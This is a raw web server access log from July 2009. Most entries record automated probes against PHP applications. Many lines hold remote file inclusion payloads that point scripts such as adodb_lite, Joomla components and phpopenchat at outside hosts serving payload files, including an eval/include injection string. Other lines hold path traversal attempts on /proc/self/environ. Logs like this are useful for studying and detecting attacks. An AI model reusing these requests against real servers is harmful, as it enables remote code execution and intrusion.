211.242.110.197 - - [16/Jul/2009:02:02:42 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sunset-travel.ro/ro/includes/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.242.110.197 - - [16/Jul/2009:02:02:42 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sunset-travel.ro/ro/includes/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.242.110.197 - - [16/Jul/2009:02:02:42 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sunset-travel.ro/ro/includes/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
114.200.199.144 - - [16/Jul/2009:02:02:50 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://emergency.yoll.net/spread.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:02:02:50 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://emergency.yoll.net/spread.txt??? HTTP/1.1" 200 9733 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:02:02:55 -0400] "GET /logs/access_log.Q109061800////?_SERVER[DOCUMENT_ROOT]=http://emergency.yoll.net/spread.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:03:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.163.252.93 - - [16/Jul/2009:02:03:30 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.242.110.197 - - [16/Jul/2009:02:03:39 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:03:39 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:03:39 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:04:30 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:04:30 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:04:30 -0400] "GET /logs/access_log.Q109061300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
211.242.110.197 - - [16/Jul/2009:02:05:20 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
67.18.63.194 - - [16/Jul/2009:02:05:25 -0400] "GET //songinfo.php?commonpath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:02:05:25 -0400] "GET /logs//songinfo.php?commonpath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:05:53 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:05:53 -0400] "GET /logs/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:05:53 -0400] "GET /?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:05:54 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.191.11.195 - - [16/Jul/2009:02:06:01 -0400] "GET /logs//trans/trans.php?trans=eng&page=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
89.191.11.195 - - [16/Jul/2009:02:06:02 -0400] "GET //trans/trans.php?trans=eng&page=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
89.191.11.195 - - [16/Jul/2009:02:06:03 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
89.191.11.195 - - [16/Jul/2009:02:06:04 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
89.191.11.195 - - [16/Jul/2009:02:06:04 -0400] "GET //trans/trans.php?trans=eng&page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 214 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:02:06:04 -0400] "GET /logs//trans/trans.php?trans=eng&page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 219 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:02:06:04 -0400] "GET //trans/trans.php?trans=eng&page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:02:06:04 -0400] "GET /logs//trans/trans.php?trans=eng&page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 219 "-" "XXXXXX"
87.106.245.84 - - [16/Jul/2009:02:06:08 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.242.110.197 - - [16/Jul/2009:02:06:08 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
87.106.245.84 - - [16/Jul/2009:02:06:08 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:06:08 -0400] "GET /logs/access_log.Q109052300%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
66.249.68.70 - - [16/Jul/2009:02:06:23 -0400] "GET /images/items/index3_trephine.jpg HTTP/1.1" 200 5563 "-" "Googlebot-Image/1.0"
76.163.252.93 - - [16/Jul/2009:02:06:31 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:06:32 -0400] "GET /logs/access_log.Q109052700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:06:59 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:06:59 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:06:59 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:07:01 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:07:01 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.231.126.252 - - [16/Jul/2009:02:07:01 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.242.110.197 - - [16/Jul/2009:02:07:11 -0400] "GET /logs/access_log.Q109053100%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET //pollphp/db//booth.php?include_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [16/Jul/2009:02:07:27 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET /logs//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET //pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 220 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET /logs//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET //pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:07:28 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
211.242.110.197 - - [16/Jul/2009:02:07:52 -0400] "GET /logs/access_log.Q109053100%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
222.236.47.192 - - [16/Jul/2009:02:07:59 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:08:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [16/Jul/2009:02:08:56 -0400] "GET /logs/access_log.Q109061800%20%20////?_SERVER[DOCUMENT_ROOT]=http://emergency.yoll.net/spread.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:09:25 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:09:25 -0400] "GET /logs/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:09:25 -0400] "GET /?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:02:09:27 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:09:40 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.190.91.120 - - [16/Jul/2009:02:09:55 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "http://sz0027.ev.mail.comcast.net/zimbra/mail" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
222.236.47.192 - - [16/Jul/2009:02:11:05 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.20.159 - - [16/Jul/2009:02:11:18 -0400] "GET /logs/error_log.Q109051800//pollphp/db//booth.php?include_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
94.23.20.159 - - [16/Jul/2009:02:11:19 -0400] "GET /logs/error_log.Q109051800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.20.159 - - [16/Jul/2009:02:11:20 -0400] "GET /logs/error_log.Q109051800//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 246 "-" "XXXXXX"
94.23.20.159 - - [16/Jul/2009:02:11:21 -0400] "GET /logs/error_log.Q109051800//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 246 "-" "XXXXXX"
209.59.12.99 - - [16/Jul/2009:02:13:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.18.63.194 - - [16/Jul/2009:02:13:16 -0400] "GET /logs/access_log.Q109071100//songinfo.php?commonpath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET /logs//123flashchat.php?phpbb_root_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET //123flashchat.php?phpbb_root_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET /logs//123flashchat.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 220 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET //123flashchat.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET /logs//123flashchat.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:02:17:45 -0400] "GET //123flashchat.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
87.106.245.84 - - [16/Jul/2009:02:18:00 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:02:18:01 -0400] "GET /logs/access_log.Q109052700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs/rgboard/1.jpg? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jul/2009:02:18:05 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [16/Jul/2009:02:18:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.131.2 - - [16/Jul/2009:02:18:38 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:18:39 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:18:39 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:18:40 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:18:41 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
74.53.131.2 - - [16/Jul/2009:02:18:41 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
218.246.20.221 - - [16/Jul/2009:02:19:04 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.246.20.221 - - [16/Jul/2009:02:19:04 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
190.144.44.36 - - [16/Jul/2009:02:20:27 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:20:27 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:20:27 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:12 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:12 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:12 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:21:14 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:21:14 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:21:14 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:18 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:18 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:18 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:19 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:22 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:21:22 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:22:27 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
92.48.127.79 - - [16/Jul/2009:02:23:14 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:02:23:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [16/Jul/2009:02:23:18 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:23:18 -0400] "GET //galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:23:18 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.254.32.2 - - [16/Jul/2009:02:23:23 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.178.116.28 - - [16/Jul/2009:02:23:45 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:02:24:28 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
